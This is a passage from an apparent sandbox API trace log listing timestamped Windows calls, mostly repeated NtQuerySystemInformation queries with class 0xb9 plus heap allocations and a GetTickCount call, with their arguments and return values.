ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.203] GetProcessHeap () returned 0x2026c630000 [0226.203] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026c66cea0 [0226.204] GetProcessHeap () returned 0x2026c630000 [0226.204] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65a9b0 [0226.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.343] GetProcessHeap () returned 0x2026c630000 [0226.343] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d340 [0226.343] GetProcessHeap () returned 0x2026c630000 [0226.343] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d420740 [0226.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.347] GetProcessHeap () returned 0x2026c630000 [0226.347] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026c66d560 [0226.347] GetProcessHeap () returned 0x2026c630000 [0226.347] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65a5c0 [0226.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.347] GetProcessHeap () returned 0x2026c630000 [0226.347] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63df70 [0226.347] GetProcessHeap () returned 0x2026c630000 [0226.347] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d420220 [0226.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x50, ResultLength=0x0) [0226.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.359] GetProcessHeap () returned 0x2026c630000 [0226.359] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63ccb0 [0226.359] GetProcessHeap () returned 0x2026c630000 [0226.359] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d420760 [0226.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.360] GetProcessHeap () returned 0x2026c630000 [0226.360] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026c66e0a0 [0226.360] GetProcessHeap () returned 0x2026c630000 [0226.360] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65a8f0 [0226.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.360] GetProcessHeap () returned 0x2026c630000 [0226.360] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63dca0 [0226.360] GetProcessHeap () returned 0x2026c630000 [0226.360] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d420c00 [0226.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x50, ResultLength=0x0) [0226.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.448] GetProcessHeap () returned 0x2026c630000 [0226.448] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63dca0 [0226.448] GetProcessHeap () returned 0x2026c630000 [0226.448] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d420e60 [0226.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.450] GetProcessHeap () returned 0x2026c630000 [0226.450] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026c66d0e0 [0226.450] GetProcessHeap () returned 0x2026c630000 [0226.450] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65ab60 [0226.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.451] GetProcessHeap () returned 0x2026c630000 [0226.451] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63c440 [0226.451] GetProcessHeap () returned 0x2026c630000 [0226.451] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d420f00 [0226.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x50, ResultLength=0x0) [0226.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x50, ResultLength=0x0) [0228.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x50, ResultLength=0x0) [0228.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x50, ResultLength=0x0) [0228.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x38, ResultLength=0x0) [0228.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f170, Length=0x28, ResultLength=0x0) [0228.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f088, Length=0x50, ResultLength=0x0) [0228.862] GetTickCount () returned 0x1179c62 [0228.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef58, Length=0x58, ResultLength=0x0) [0228.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee70, Length=0x38, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eca0, Length=0x28, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eca0, Length=0x28, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eca0, Length=0x28, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eca0, Length=0x28, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed10, Length=0x28, ResultLength=0x0) [0228.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee70, Length=0x38, ResultLength=0x0) [0228.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed90, Length=0x28, ResultLength=0x0) [0228.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed90, Length=0x28, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee70, Length=0x38, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x20, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x20, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x20, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x20, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee70, Length=0x38, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecf0, Length=0x20, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x20, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x20, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef58, Length=0x58, ResultLength=0x0) [0228.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x38, ResultLength=0x0) [0228.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x28, ResultLength=0x0) [0228.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x28, ResultLength=0x0) [0228.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x28, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x28, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x38, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x38, ResultLength=0x0) 